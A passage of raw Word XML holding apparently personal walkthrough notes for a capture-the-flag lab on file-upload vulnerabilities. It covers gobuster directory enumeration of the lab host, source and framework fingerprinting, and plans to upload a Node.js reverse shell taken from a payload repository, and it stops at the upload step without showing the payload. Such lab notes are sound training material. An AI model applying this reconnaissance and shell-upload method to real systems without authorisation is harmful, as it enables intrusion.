        <w:t>SOLUTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34549754" w14:textId="055D45CF" w:rsidR="00484956" w:rsidRPr="0084205E" w:rsidRDefault="00484956" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ENUMERATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664BD6DC" w14:textId="631F119F" w:rsidR="00484956" w:rsidRPr="0084205E" w:rsidRDefault="00484956" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://jewel.uploadvulns.thm</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/directory-list-txt</w:t>
      </w:r>
      <w:r w:rsidR="00CC0AD7" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CC0AD7" w:rsidRPr="0084205E">
        <w:t>php,txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CC0AD7" w:rsidRPr="0084205E">
        <w:t>,html</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -t 250 | tee </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-root-big</w:t>
      </w:r>
      <w:r w:rsidR="00B533E5" w:rsidRPr="0084205E">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA82785" w14:textId="303D3283" w:rsidR="00542092" w:rsidRPr="0084205E" w:rsidRDefault="00542092" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ID directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C7892F" w14:textId="4B9C6ACB" w:rsidR="00542092" w:rsidRPr="0084205E" w:rsidRDefault="00542092" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">200 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>code</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4AB9DB97" w14:textId="2183790B" w:rsidR="00B533E5" w:rsidRPr="0084205E" w:rsidRDefault="00B533E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Navigate to these pages in URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC75B6F" w14:textId="41756B97" w:rsidR="00B533E5" w:rsidRPr="0084205E" w:rsidRDefault="00B533E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Look for how these pages interact with other pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D3E06F" w14:textId="750A17FC" w:rsidR="00B533E5" w:rsidRPr="0084205E" w:rsidRDefault="00B533E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Re-Run with directories attached with new wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F471190" w14:textId="25448ABB" w:rsidR="00B533E5" w:rsidRPr="0084205E" w:rsidRDefault="00B533E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://jewel.uploadvulns.thm/&lt;directory</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">&gt; -w &lt;wordlist&gt; -t 250 </w:t>
      </w:r>
      <w:r w:rsidR="00B26B24" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">-x &lt;extension being sought, such as jpg&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">| tee </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-&lt;directory&gt;-default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA4710D" w14:textId="11963C85" w:rsidR="00B533E5" w:rsidRPr="0084205E" w:rsidRDefault="00B533E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Useful for searching through directories to ensure nothing is missed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A3A287" w14:textId="43E31086" w:rsidR="00484956" w:rsidRPr="0084205E" w:rsidRDefault="00484956" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>CHECK SOURCE CODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FDBE5E" w14:textId="7CC5B84F" w:rsidR="0094018E" w:rsidRPr="0084205E" w:rsidRDefault="0094018E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ctrl+u</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E13241A" w14:textId="372B9EA1" w:rsidR="00484956" w:rsidRPr="0084205E" w:rsidRDefault="00484956" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Find common or recurring directories that are used to pull from for content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7151FA" w14:textId="3873D3AA" w:rsidR="00484956" w:rsidRPr="0084205E" w:rsidRDefault="00484956" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=&lt;directory&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8BFD4B" w14:textId="365635CB" w:rsidR="00484956" w:rsidRPr="0084205E" w:rsidRDefault="00484956" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=&lt;directory&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245A8311" w14:textId="7C13B8FC" w:rsidR="00542092" w:rsidRPr="0084205E" w:rsidRDefault="00542092" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Fixed content is unlikely to be useful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A577AE" w14:textId="74C0C730" w:rsidR="00542092" w:rsidRPr="0084205E" w:rsidRDefault="00542092" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Wappalyzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22A682C9" w14:textId="43DF28F4" w:rsidR="00542092" w:rsidRPr="0084205E" w:rsidRDefault="00542092" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Programming Languages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6332FE64" w14:textId="4AB9B644" w:rsidR="00542092" w:rsidRPr="0084205E" w:rsidRDefault="00542092" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Node.js = PHP reverse will NOT work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51921B94" w14:textId="0A6B7656" w:rsidR="00B533E5" w:rsidRPr="0084205E" w:rsidRDefault="00B26B24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>PayloadsAllTheThings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> (GITHUB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A78041" w14:textId="5DFBB579" w:rsidR="00B26B24" w:rsidRPr="0084205E" w:rsidRDefault="00B26B24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> for code specific</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6DD261" w14:textId="518AEFCA" w:rsidR="00B26B24" w:rsidRPr="0084205E" w:rsidRDefault="00B26B24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>In this case node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1DF9A3" w14:textId="1DA4A0A2" w:rsidR="00B26B24" w:rsidRPr="0084205E" w:rsidRDefault="00B26B24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Copy and paste code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB31AED" w14:textId="0F9FCEAE" w:rsidR="00B26B24" w:rsidRPr="0084205E" w:rsidRDefault="00B26B24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Edit options in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>TextEditor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> as necessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27453D18" w14:textId="43DD8CE2" w:rsidR="00B533E5" w:rsidRPr="0084205E" w:rsidRDefault="00B533E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Will not allow direct traversal to upload PATH as PHP website would</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25728BDA" w14:textId="45CB7C42" w:rsidR="00B533E5" w:rsidRPr="0084205E" w:rsidRDefault="00B533E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Need another means of activating upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6ACBB1" w14:textId="43CED447" w:rsidR="00B533E5" w:rsidRPr="0084205E" w:rsidRDefault="00B533E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Above mentioned Admin page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D8AA6D" w14:textId="0441276E" w:rsidR="00542092" w:rsidRPr="0084205E" w:rsidRDefault="00542092" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Web Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5292527E" w14:textId="599ADFB8" w:rsidR="00542092" w:rsidRPr="0084205E" w:rsidRDefault="00542092" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>X-Powered-By</w:t>
      </w:r>
      <w:r w:rsidR="00B26B24" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B26B24" w:rsidRPr="0084205E">
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B26B24" w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCB352F" w14:textId="21F9DA63" w:rsidR="00542092" w:rsidRPr="0084205E" w:rsidRDefault="00542092" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Express</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093BC868" w14:textId="25858ABC" w:rsidR="00542092" w:rsidRPr="0084205E" w:rsidRDefault="00542092" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Node.js Express Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F280F90" w14:textId="6E8BEEEA" w:rsidR="00B26B24" w:rsidRPr="0084205E" w:rsidRDefault="00B26B24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Confirm </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Wappalyzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> findings and what that means for your hack tactics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7913044A" w14:textId="1F0F3D91" w:rsidR="00542092" w:rsidRPr="0084205E" w:rsidRDefault="00542092" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>CTRL-SHIFT + I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B9B87F" w14:textId="2C0716ED" w:rsidR="00542092" w:rsidRPr="0084205E" w:rsidRDefault="00542092" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Inspector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27073F77" w14:textId="12943D6C" w:rsidR="00542092" w:rsidRPr="0084205E" w:rsidRDefault="00542092" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>CSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C050D5B" w14:textId="4395BAF3" w:rsidR="00542092" w:rsidRPr="0084205E" w:rsidRDefault="00542092" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>URLs for Images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6231D451" w14:textId="3C776F28" w:rsidR="00B26B24" w:rsidRPr="0084205E" w:rsidRDefault="00B26B24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can assist in determining where certain file types go/are stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC4D45B" w14:textId="0D910B79" w:rsidR="00B26B24" w:rsidRPr="0084205E" w:rsidRDefault="00B26B24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ATTEMPT UPLOAD OF SHELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1071D110" w14:textId="294DF818" w:rsidR="00B26B24" w:rsidRPr="0084205E" w:rsidRDefault="00B26B24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
